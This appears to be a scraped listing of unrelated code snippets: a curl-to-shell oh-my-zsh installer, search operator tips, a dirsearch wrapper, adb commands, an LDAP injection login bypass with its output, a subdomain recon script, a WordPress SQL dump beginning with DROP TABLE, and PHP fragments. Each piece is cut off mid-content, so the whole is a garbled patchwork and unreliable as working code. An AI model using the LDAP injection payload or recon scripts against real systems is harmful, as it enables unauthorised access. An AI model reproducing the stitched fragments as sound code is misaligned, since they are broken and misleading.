sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"
- Download zsh-autosuggestions by
| Filter | Description | Example |
|---|---|---|
| allintext | Searches for occurrences of all the keywords given. | allintext:"keyword" |
| intext | Searches for the occurrences of keywords all at once or one at a time. | intext:"keyword" |
| inurl | Searches for a URL matching one of the keywords. | inurl:"keyword" |
| allinurl | Searches for a URL matching all the keywords in the query. | allinurl:"keyword" |
| intitle | Searches for occurrences of keywords in title all or one. | intitle:"keyword" |
| #!/bin/bash | |
| #dirsearchem | |
| #$1 box name | |
| #$2 URL (check for Domain, HTTPS, port first) | |
| clear | |
| date | |
| echo "Running dirsearch on $1 $2" |
| == Adb Server | |
| adb kill-server | |
| adb start-server | |
| == Adb Reboot | |
| adb reboot | |
| adb reboot recovery | |
| adb reboot-bootloader | |
| == Shell |
| § curl "william:password@localhost:9080/login" | |
| Login failed | |
| By exploiting the LDAP injection, we bypass the LDAP filter constraint and are successfully signed in: | |
| $ curl "william))(&(abc=:password@localhost:9080/login" | |
| WSPrincipal:uid=william,cn=users,dc=my-company,dc=com |
| ##!/bin/bash | |
| #starting sublist3r | |
| sublist3r -d $1 -v -o domains.txt | |
| #running assetfinder | |
| /bin/assetfinder --subs-only $1 | tee -a domains.txt | |
| #removing duplicate entries | |
| sort -u domains.txt -o domains.txt | |
| #checking for alive domains | |
| echo "\n\n[+] Checking for alive domains..\n" | |
| cat domains.txt | /bin/httprobe | tee -a alive.txt |
| DROP TABLE IF EXISTS wp_users; | |
| CREATE TABLE wp_users ( | |
| ID bigint(20) unsigned NOT NULL auto_increment, | |
| user_login varchar(60) NOT NULL default '', | |
| user_pass varchar(64) NOT NULL default '', | |
| user_nicename varchar(50) NOT NULL default '', | |
| user_email varchar(100) NOT NULL default '', | |
| user_url varchar(100) NOT NULL default '', | |
| user_registered datetime NOT NULL default '0000-00-00 00:00:00', | |
| user_activation_key varchar(60) NOT NULL default '', |
| <?php | |
| function array_make_first(&$array, $element) { | |
| if (($ndx = array_search($element, $array)) !== false) { | |
| unset($array[$ndx]); | |
| array_unshift($array, $element); | |
| } | |
| } | |
| $encler = mb_list_encodings(); |
| <?php | |
| /** | |
| This is a simple proof of concept of a brute force algorithm for string matching with | |
| given set of characters. | |
| The way this works is that the algorithm counts from first to last possible combination of | |
| given characters. Instead of counting(incrementing) in number base 10 we use | |
| a new base which is derived from your set of possible characters (we count in symbols). | |
| So if your characters list contains 27 characters the program actually counts in a 27 base | |
| number system. |